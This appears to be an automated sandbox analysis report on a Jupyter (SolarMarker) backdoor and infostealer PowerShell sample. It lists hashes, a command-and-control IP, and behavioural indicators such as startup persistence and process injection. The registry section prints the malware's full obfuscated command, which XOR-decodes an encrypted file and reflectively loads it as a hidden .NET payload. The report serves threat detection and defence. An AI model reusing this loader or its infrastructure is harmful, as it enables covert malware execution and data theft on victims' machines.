jupyter | d55bef20fb35bfa047a9e798033c7b7a55b0ca0ace429e309a3d7cf67b29b8bf

General

Target

eb6bc8b129be5249bada70182e4de5d14036b9d45db954ecfd2559da1e17053f.ps1
Size

65KB
MD5

12269047226f5871f1993084f95cf496
SHA1

b1f37fc678807b17f19cce8e31d8fd254d52eea1
SHA256

eb6bc8b129be5249bada70182e4de5d14036b9d45db954ecfd2559da1e17053f
SHA512

49be3c32c8feb9051c456195485d092d2ed448e70e29bfc9b673f87de81b5495c8dcaa51b3d0c4553d7f0fb42aaa00c81d7df7470db5444029d638968cdbcc5e
SSDEEP

1536:TB/0A9qWmZeyDuI4SAtB6aDN8wLDscn4JTIBp53L2o6E:SzZTuI4p61aDsH2yo6E

Score

10^/10

jupyter backdoor execution stealer trojan

Malware Config

Extracted

Family

jupyter

Version

OC-12

C2

http://92.204.160.233

Signatures

Jupyter Backdoor/Client payload 1 IoCs

resource	yara_rule
behavioral2/memory/4980-308-0x0000019529AF0000-0x0000019529B02000-memory.dmp	family_jupyter

Jupyter family
jupyter
Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
backdoor trojan stealer jupyter

Blocklisted process makes network request 5 IoCs

flow	pid	Process
20	4980	powershell.exe
35	4980	powershell.exe
38	4980	powershell.exe
44	4980	powershell.exe
45	4980	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\mICRoSoft\wIndOWs\sTArt menU\PrograMs\StaRtup\ab5e336ae7d4219cb748edd80932b.LnK	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4980	powershell.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\nsrccujuyraxpofimrwh	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\nsrccujuyraxpofimrwh\shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\nsrccujuyraxpofimrwh\shell\open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\nsrccujuyraxpofimrwh\shell\open\command\ = "pOweRsHell -ep BYpAss -cOmmand \"$a1baeba005842baa14d840b50814a=add-tYPe -MEmbERDEfinItion ('['+'d'.tOUPPER()+'Ll'.TOLOWer()+'i'.toUppeR()+'MpOrt('.tOLOWer()+[chAR]0X22+'USer32.DlL'.tolOWer()+[CHAr]0X22+')]puBLIC STatiC ExteRn bOoL '.tOlOWER()+'s'.ToUPPEr()+'hoW'.TOLoWER()+'w'.TOuPPEr()+'iNdoW'.tOLOWer()+'A'.TOuPpER()+'sYNC('.tOlOWEr()+'I'.toUpPER()+'NT'.tolowER()+'p'.TOUPPer()+'Tr hWnd, INT NcMdShOw);'.tolOWEr()) -Name ('W'.ToUPpEr()+'in32'.TOlowER()+'S'.TOuPPer()+'HoW'.tOloWEr()+'w'.ToUpPEr()+'indow'.ToLOwEr()+'A'.tOuPpeR()+'SynC'.tOloWEr()) -NAMeSpACe wIN32funCtiOns -paSstHRu;$a1baeba005842baa14d840b50814a::ShOwWiNDoWASynC((get-prOCeSS -iD $PiD).mAInWinDOWhanDle, 0);$aa52a90a73049291db52d4736eedd='Xk1zYjRAU3ZXT0BVd2BrQHw+PSheTnE4JEBxPzxVQFZ9TTVeT3ZRekBzWGFiQH1RLU5AdjRAeF5TKzYlQHE/ek1AYFF3Z0B+Vk5UQH1HezVAeE9fX0B0dlpKQHd1PnFAcSZ6IUB+eVVwQHJ0MGNebzVPfUB3bUk1XlNZQz9AVlRrQj83ZlRkbVY+NDhwTWp3QnByb0poenB0VjZpR2khO2wlVnNxZlJGSTZnTjUrMHFwOWVGd2VOKEdeb3hkfF5Rb3FTQH0tNTBAdzw8aUB9aX1OXk18Q0hAX35gRF5TT3p1XlNYKHVAVkIzVkB3dU9rQHc8K3pAYGJIfEB2cDkpQFRIPW4=';$aae81a6bdec4bfb297ccc76412f38=0;$af2a3e3d28b4f5b2b2f35570f4d78=[IO.fILe]::ReaDALlBYTES('C:\\Users\\Admin\\AppData\\Roaming\\adoBe\\cdmWLZTZyziuxy\\jhfmyYIcjWUeQqJUlKkvTSKseK.XdNNOZtJHPfBTIBwMD');(0..$af2a3e3d28b4f5b2b2f35570f4d78.CoUnt)\|fOReACH{if($aae81a6bdec4bfb297ccc76412f38 -GE $af2a3e3d28b4f5b2b2f35570f4d78.CouNT){}ElsE{for($afac80e3a564fe8f6bd678e390350=0;$afac80e3a564fe8f6bd678e390350 -lt $aa52a90a73049291db52d4736eedd.leNGth;$afac80e3a564fe8f6bd678e390350++){$af2a3e3d28b4f5b2b2f35570f4d78[$aae81a6bdec4bfb297ccc76412f38]=$af2a3e3d28b4f5b2b2f35570f4d78[$aae81a6bdec4bfb297ccc76412f38] -bxOR $aa52a90a73049291db52d4736eedd[$afac80e3a564fe8f6bd678e390350];$aae81a6bdec4bfb297ccc76412f38++;If($aae81a6bdec4bfb297ccc76412f38 -ge $af2a3e3d28b4f5b2b2f35570f4d78.cOunt){$afac80e3a564fe8f6bd678e390350=$aa52a90a73049291db52d4736eedd.lENgtH}}}};[ReFLECtion.ASSemBLY]::lOAd($af2a3e3d28b4f5b2b2f35570f4d78);[afae244b38544ba97152326ef6f07.a3062bad2834e29fdf2d3e9f5eebe]::a769162b1d24ca80f604252197fc7()\""	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\.mgprfbmeffxydws	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\.mgprfbmeffxydws\ = "nsrccujuyraxpofimrwh"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\nsrccujuyraxpofimrwh\shell\open\command	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4980	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4980 wrote to memory of 692	4980	powershell.exe	84
PID 4980 wrote to memory of 692	4980	powershell.exe	84
PID 692 wrote to memory of 2856	692	csc.exe	85
PID 692 wrote to memory of 2856	692	csc.exe	85

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\eb6bc8b129be5249bada70182e4de5d14036b9d45db954ecfd2559da1e17053f.ps1
1⤵
- Blocklisted process makes network request
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4980
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bnbm45we\bnbm45we.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:692
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB40E.tmp" "c:\Users\Admin\AppData\Local\Temp\bnbm45we\CSC948A2E4634324B546A25CF74A63.TMP"
    3⤵
    PID:2856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB40E.tmp

Filesize
1KB

MD5
53c4208385ed7621eef1a11a09775ea0

SHA1
8ebfdbb20ad6b6ca93861c20f1fcd26c20b85617

SHA256
021ba24a8a1fc59a8298b90cfde1fc2f685fabb1af919b4335cefff54dc6ca0a

SHA512
e6e1e9f33930df1866c17fc5409a5577632279ff1ea68131ee40bdd119ac3794c517f899581aac2558f1d6c4ca9bba0d712add126acdd3cc8a8b505284865ce9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3vvksh5o.5aj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bnbm45we\bnbm45we.dll

Filesize
3KB

MD5
b8fcb52f19e7160f583c8ba2d13b8242

SHA1
dac6c26375e46bbbd4c0431c8a07e4296dc59f4d

SHA256
935ef73e42d922f87a672c1abb0312553113a3983894ae492e393e41b91a8d32

SHA512
4ae13bded42cc0c3cb74a679d19eb02afdad3efa28d4e9db8cf1ee5fd1ba2ae7854dc1cc5e0d8ded884a4cbd289a63f0f0efac6ad3a422b43585deab24cd8e16

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bnbm45we\CSC948A2E4634324B546A25CF74A63.TMP

Filesize
652B

MD5
396f917a42953385ffa21d30c2482bb4

SHA1
b11aa889f523a5801e768efbcf2a182dd4c0815b

SHA256
cedbf4ec19367efd6c2d65faf8ef3ffea72fc81339231ba3d6ac419120af4da7

SHA512
7d4f23de3902b02f1af6dd3409b59f26cc061d8130b9a6597ed9852683ae8c1ad547307835fb1276143ef275ed8c8e6562bc4a19a89b312072298d60f3816151

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bnbm45we\bnbm45we.0.cs

Filesize
236B

MD5
d4b917080b8fb08a3b868465e8fe7841

SHA1
3e14b90f9e1d314fa7c98b57599a4475cad63ee5

SHA256
f82e63bed7f49d98d714988dd56018798a332ab6a41c142c6fdfa357c2038b68

SHA512
6d6a9b3ab3c9ab0d7e249472b50ddc022720a6f1a26c70c37689cbbdce43ec5f8280f24804cbb75e4c06c279b1418cf4a6ccbccd0de6873d94c7b723899654a2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bnbm45we\bnbm45we.cmdline

Filesize
369B

MD5
f3e05072326d39631b9e37597064f446

SHA1
7d86cb54a2879e1d1ad9a9ac83265c06388a9081

SHA256
fa2361efb73c2131f1740649a4f162b77403dc87b461903bd12d6a83bc74d9e9

SHA512
bb090446af8c237e3e43b83180efb803589e1c925a3b2e72cf112db6ae25c0e618b662def4994925363dca3fcb45c7f3f69f1e2f9ddf8acf9544d27988b31567

Download Submit
memory/4980-11-0x000001950F0B0000-0x000001950F0D2000-memory.dmp

Filesize
136KB

Download
memory/4980-0-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

Filesize
2.0MB

Download
memory/4980-1-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

Filesize
2.0MB

Download
memory/4980-24-0x000001950F020000-0x000001950F028000-memory.dmp

Filesize
32KB

Download
memory/4980-26-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

Filesize
2.0MB

Download
memory/4980-308-0x0000019529AF0000-0x0000019529B02000-memory.dmp

Filesize
72KB

Download
memory/4980-309-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing